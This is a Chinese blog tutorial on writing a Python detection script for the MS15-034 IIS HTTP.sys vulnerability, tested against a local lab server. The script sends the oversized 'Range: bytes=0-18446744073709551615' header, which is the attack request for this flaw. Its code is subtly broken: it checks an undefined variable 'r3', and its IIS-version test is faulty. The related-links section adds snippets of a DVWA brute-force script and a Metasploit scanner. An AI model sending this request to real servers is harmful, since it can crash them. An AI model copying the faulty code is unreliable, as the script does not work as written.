python编写工具07_编写一个漏洞检测工具(ms15-034)

最新推荐文章于 2023-03-08 15:58:00 发布
最新推荐文章于 2023-03-08 15:58:00 发布
阅读量473 收藏 2
点赞数
分类专栏: 代码编写工具 文章标签: python ms15-034
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43970718/article/details/114604059
版权

漏洞原理

1. 一些问题

	问:
		为什么有成熟的工具了,我们还需要自己编写?

	答:
		一些漏洞刚刚被披露出来的时候,网上是没有对应的工具的。
			
		这个时候就要求我们根据漏洞原理写出对应的POC代码,用来验证漏洞是否存在。

2. 本文以ms15-034为例子。

原理的话,本文就不占用篇幅取介绍了,可以自行百度。

复现的话,本机装一个win7 sp1,开启iis服务即可。

Win 7安装iis 7组件:https://jingyan.baidu.com/article/2fb0ba40916a1c00f2ec5ff7.html

代码编写

在这里插入图片描述

在这里插入图片描述

import requests

url = "http://192.168.26.133"

r = requests.get(url)
server = r.headers["Server"]

if server.find("IIS/7.5") or server.find("IIS/8.0"):
    payloay = {"Host":"irrelevant","Range": "bytes=0-18446744073709551615"}  #注意字典内容格式
    r1 = requests.get(url,headers=payloay)
    if "Requested Range Not Satisfiable" in r3.text:
        print("检测存在ms15-034")
    else:
        print("未检测到ms15-034")
else:
    print("服务器组件不是IIS 7.5或者IIS 8.0")
划水的小白白
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
自己动手编写SQL注入漏洞扫描工具
12-19
在CSDN上没有找到,所以将别处下载的上传过来,必须免费分享! 包括两个程序,代码尚未调试,希望有所借鉴。 代码仅供学习交流,切勿行危害安全之事,务必遵守法律法规!
Python编写带GUI界面的漏洞检测工具(Struts2)
weixin_47536169的博客
06-11 1361
Python编写带GUI界面的漏洞检测工具(Struts2)
python漏洞利用脚本_MS15-034 Python脚本漏洞检测
weixin_39939661的博客
12-18 352
import requests代码区域print(" =================================================")print(" ")print(" MS15-034 漏洞 CheckList(WEB安全...
python 漏洞扫描工具_基于Python3的漏洞检测工具
weixin_39530437的博客
12-10 733
Python3 漏洞检测工具 -- lancelance, a simple version of the vulnerability detection framework based on Python3.基于Python3的简单版漏洞检测框架 -- lance可以自定义poc或exp插件,可以指定要加载的poc或exp。代码已经上传到Github :https://github.com/b...
MS15-034漏洞检测工具-PY脚本
04-18
IIS高风险漏洞MS15-034的POC,可利用脚本检测漏洞是否存在。
ms15-034漏洞监测脚本
05-09
可以通过使服务器蓝屏崩溃监测服务器是否存在漏洞,以便修改加固。
MS15-034-Scanner:支持通过http和https扫描MS15-034漏洞的应用程序
05-16
MS15-034-扫描仪 MS15-034-Scanner是Windows命令行实用程序,它扫描[MS15-034]( )漏洞一个或多个URL。以非破坏性的方式该实用程序使用原始套接字来执行扫描,从而绕过大多数本机.NET Web浏览器或客户端(阻止...
ms15-034-checker:用于检查 ms15-034 的 Ruby 脚本
06-11
#MS15-034-检查器一个简单的 Ruby 脚本,用于检查您的 IIS 服务器是否易受 MS15-034 攻击。 这是为任何其他 Ruby 脚本编写编写的,用于查看、学习和扩展,因为似乎唯一的东西是在 Python 或 Metasploit 模块中。 #...
MS15-034 HTTP.sys远程执行代码漏洞(原理扫描)
11-16
Microsoft Windows是美国微软(Microsoft)公司发布的一系列操作系统。Microsoft Internet Information Services(IIS)是一套运行于Microsoft Windows中的互联网基本服务。 使用Microsoft IIS 6.0以上版本的...
Struts2-057漏洞检测python脚本
11-04
Struts2-057检测python脚本,支持命令回显,计算和弹计算器
strust2漏洞批量检查利用python脚本
05-17
python2.7,暂不支持python3,需安装几个python模块。
python之——使用python编写爆破脚本
12-21
此处以dvwa网站的密码爆破为例 #coding:utf-8 """ dvwa高级爆破 需要用户名 密码 token cookie 每次通过账号密码访问之前,需要获取token """ import urllib2 from bs4 import BeautifulSoup def getToken(): """提取token""" url="http://localhost/DVWA-master/vulnerabilities/brute/" req=urllib2.Request(url,headers={"Cookie":"security=high;PHP
MS15-034:POC MS15-034
06-09
这是针对以下内容的测试 POC:MS15-034:HTTP.sys (IIS) DoS 和可能的远程代码执行。 作者:易卜拉欣 Hegazy @Zigoo0 要开始使用该工具,只需创建 list.txt 文件,并将您要测试的所有站点添加到该文件中。 你准备好了:) 该工具是用python编写的,如果你没有安装python,你可以从:python.org下载 安装后,启动该工具,输入 list.txt,该工具将处理其余的 :-) 特征: 1-可以扫描多个站点。 2- 支持 SSL 3-超级用户友好:D
python漏洞扫描器编写,用Python编写Web漏洞检测工具
weixin_42520374的博客
03-26 3022
作为单位的网络安全管理员,经常会遇到这样的情况,某些漏洞在互联网上被批露后,在用的扫描工具却无法及时集成。遇到这种情况,领导会说:“自己想办法,抓紧检测是否有这个漏洞。”很多人会告诉你可以用自行编写Poc这个方法,指的就是根据漏洞的简单原理写出对应的漏洞检测代码,用来验证漏洞是否存在。那么如何编写Poc呢?可能你会把它想象的无比困难。Python的出现,极大简化了Poc的编写过程,我们不需要再把时...
SQL注入漏洞测试(布尔盲注)python
weixin_45445398的博客
03-08 445
打开题目后,显然使用order by 判断列数 select 1,2,3,4 发现错误没有回显(有回显的参照我之前发的)这时候就开始爆破数据库了(我使用手动+py脚本,sqlmap更方便这里练习就使用py)得到列名 name password status,后就是爆破里面的数据。输出得到mozhe mozhe,同样的将name换成password后得到。当判断数据库长度为1时页面错误看源码不断实验发现数据库名长度为10。得到数据库名stormgroup,之后开始爆破表个数,表长和表名。
各语言漏洞检测工具
weixin_34192816的博客
09-10 158
2019独角兽企业重金招聘Python工程师标准>>> ...
编写自己的扫描器
qq_43776408的博客
10-31 529
1.先cd到scanner目录 cd /usr/share/metasploit-framework/modules/auxiliary/scanner/ 2.写简单的TCP扫描脚本,以下是用Ruby语言写的 意思是连接远程的12345端口,并发送HELLO WORLD字符串 #Metasploit require 'msf/core' class Metasploit3 < Msf::A...
ms15-034修复打补丁
最新发布
08-31
您好!针对 ms15-034 的修复,您可以通过以下步骤来打补丁: 1. 首先,确保您的系统已经安装了最新的安全补丁。您可以在微软官方网站上查找并下载相应的补丁程序。 2. 下载适用于您的操作系统和架构的修复补丁。微软通常会提供适用于不同操作系统版本和架构(32位或64位)的修复补丁。 3. 在下载补丁之前,建议先备份您的系统和关键数据,以防意外情况发生。 4. 下载完补丁后,双击运行补丁程序,并按照提示完成安装过程。 5. 安装完成后,重新启动系统以使修复生效。 请注意,在打补丁前,请确保您从可信赖的来源下载补丁,并且在安装之前备份数据,以避免潜在的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

划水的小白白

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值